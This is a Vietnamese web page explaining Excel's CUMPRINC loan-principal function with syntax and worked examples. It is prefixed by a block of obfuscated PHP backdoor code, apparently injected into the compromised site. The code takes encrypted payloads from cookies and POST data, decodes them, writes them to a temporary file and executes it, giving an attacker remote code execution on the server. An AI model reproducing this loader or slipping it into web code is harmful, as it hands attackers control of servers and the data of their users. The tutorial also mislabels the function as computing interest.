$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Hàm Cumprinc trong Excel – Hàm tính lãi suất tài chính - Tải Chùa

Hàm Cumprinc trong Excel – Hàm tính lãi suất tài chính

Rate this post
Hàm Cuprinc trong Excel là hàm tính lãi suất tài chính cho khoản vay từ đầu cho đến cuối kỳ hạn. Vậy cách sử dụng như nào, cùng tìm hiểu trong bài chia sẻ dưới đây nhé.

Trong trường hợp bạn phải tính toán đầu tư, hoạt động kinh doanh và không đủ số vốn đầu tư thì việc vay vốn đầu tư là phương pháp tối ưu được nhiều doanh nghiệp, cá nhân áp dụng. Khi đã vay được vốn đầu tư thì bạn cần phải tính lãi suất tài chính phải trả cuối kì là bao nhiêu để có phương án thích hợp. Lúc này thì hàm Cumprinc trong Excel là công cụ hỗ trợ đắc lực có thể giúp bạn.

Hàm Cumprinc trong Excel

Hàm Cumprinc trong Excel

Hàm Cuprinc trong Excel là hàm tính lãi suất tài chính cho khoản vay từ đầu cho đến cuối kỳ hạn. Thông thường thì hàm Cuprinc sẽ trả về giá trị âm bởi vì giá trị này thể hiện được số tiền bạn sẽ mất đi do vay vốn hoạt động kinh doanh. Nó được áp dụng trên những phiên bản Office 2003, Office 2007, Office 2010 và Office 2013. Hãy cùng nhau tìm hiểu cách dùng hàm tính lãi suất tài chính này nhé.

Cách sử dụng hàm Cumprinc – Hàm tính lãi suất tài chính

Cú pháp:

=CUMPRINC(rate, nper, pv, start_period, end_period, type)

Trong đó:

  • Rate: Lãi suất vay, tham số bắt buộc.
  • Nper: tổng kỳ hạn người vay phải thanh toán, tham số bắt buộc.
  • Pv: giá trị vay hiện tại, tham số bắt buộc.
  • Start_period: kỳ hạn đầu tiên, tham số bắt buộc.
  • End_period: kỳ hạn cuối cùng, tham số bắt buộc.
  • Type: Thời hạn người vay phải thanh toán, tham số bắt buộc.

Lưu ý: type =0 dành cho thanh toán cuối kỳ còn type =1 thì dành cho thanh toán đầu kỳ.

Ví dụ:

Cho bảng tính bên dưới đây, những giá trị đã được nhập vào tương ứng tham số hàm trong Excel. Yêu cầu bạn phải tính được tổng nợ khoản vay phải trả trong tháng đầu tiên và năm thứ 2 với dữ liệu trên đây.

Cách dùng hàm Cumprinc trong excel

Ví dụ hàm Cumprinc

Tính tổng nợ khoản vay phải trả trong tháng đầu tiên nhập đúng theo cú pháp trên: =CUMPRINC(D7/12,D8*12,D9,1,1,0). Ý nghĩa các tham số như sau:

  • D7/12: Lãi suất mỗi tháng (chia lãi suất hàng năm cho 12).
  • D8*12: Số lần thanh toán (số năm phải trả lãi nhân với 12).
  • D9: Giá trị hiện tại.
  • 1, 1: nợ gốc trong tháng đầu tiên
  • 0: Thanh toán cuối kỳ.

Kết quả ta được khoản nợ mang giá trị âm:

Ví dụ hàm Cumprinc trong Excel

Kết quả tính tổng nợ trong tháng đầu tiên

Tính tổng nợ khoản vay phải trả trong năm thứ 2 tức là bắt đầu từ kỳ 13 đến kỳ 24. Bạn nhập cú pháp: =CUMPRINC(D7/12,D8*12,D9,13,24,0).  Ý nghĩa các tham số như sau:

  • D7/12: Lãi suất mỗi tháng (chia lãi suất hàng năm cho 12).
  • D8*12: Số lần thanh toán (số năm phải trả lãi nhân với 12).
  • D9: Giá trị hiện tại.
  • 13, 24: Nợ vay tính từ kỳ 13 đến kỳ 24.
  • 0: Thanh toán cuối kỳ.

Kết quả ta được như sau:

Hàm Cumprinc

Kết quả tổng nợ phải trả trong năm thứ 2

Tất cả khoản nợ đều mang giá trị âm. Như vậy chúng tôi vừa mới hướng dẫn bạn các tính lãi suất vay vốn tài chính bằng hàm CUMPRINC đơn giản và dễ dàng thực hiện nhất. Ngoài ra bạn có thể tham khảo thêm hàm đếm nhiều điều kiện COUNT nhé. Hy vọng những thủ thuật này sẽ giúp bạn sử dụng thành thạo ứng dụng Excel hơn nhé.